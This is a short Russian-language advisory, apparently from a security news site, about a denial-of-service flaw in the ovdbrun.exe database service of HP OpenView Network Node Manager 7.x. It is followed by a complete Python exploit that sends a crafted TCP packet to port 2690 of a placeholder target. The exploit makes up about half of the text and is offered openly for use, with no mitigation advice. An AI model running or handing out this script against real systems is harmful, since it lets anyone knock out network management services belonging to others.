Программа: HP OpenView Network Node Manager (NNM) 7.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в сервисе
базы данных (ovdbrun.exe) при обработке TCP пакетов. Атакующий может передать
специально сформированные пакеты на TCP порт 2690, что приведет к отказу системы
в обслуживании.

Эксплоит:

#!python
import socket
import struct

a = struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"

target_ip = 'X.X.X.X'

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2690))

s.send(a)
s.close()



Оставить мнение